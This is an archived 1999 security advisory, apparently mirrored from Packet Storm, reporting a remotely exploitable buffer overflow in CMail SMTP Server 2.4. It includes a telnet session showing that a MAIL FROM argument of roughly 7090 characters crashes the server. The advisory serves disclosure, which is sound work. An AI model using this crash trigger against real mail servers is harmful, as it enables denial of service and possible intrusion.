Lucene search
K

cmail-2.4.txt

🗓️ 02 Nov 1999 00:00:00Reported by Underground Security Systems ResearchType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

Buffer overflow vulnerability in CMail SMTP Server Version 2.4 allows remote code execution.

Code
`CMail SMTP Server  
Version 2.4:   
Remotely exploitable buffer overflow  
  
CMail SMTP Server Version 2.4 Problem: We found a buffer overflow in  
the CMail SMTP service (long MAIL FROM:) that may allow an attacker to  
execute arbitrary code on the target server, it is based on the eEye  
pointed out overflows in cmail 2.3 >:-] Which was never fixed...   
software vendors still not taking security issues seriously.  
  
Example:   
  
[cham@guilt cham]$ telnet example.com 25 Trying  
example.com...  
Connected to example.com. Escape character is '^]'.  
220 SMTP services ready. Computalynx CMail Server Version: 2.4  
helo ussr  
250 Hello ussr [yourip], how are you today?   
MAIL FROM: cmail<[buffer]@cmaildotcom.com>   
Where [buffer] is aprox. 7090 characters.  
At his point the server overflows and crashes.   
  
  
Just a typical buffer overflow that should  
have been fixed in version 2.3 when it was pointed out to them.  
  
Luck Martins   
  
u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h   
  
WWW.USSRBACK.COM  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation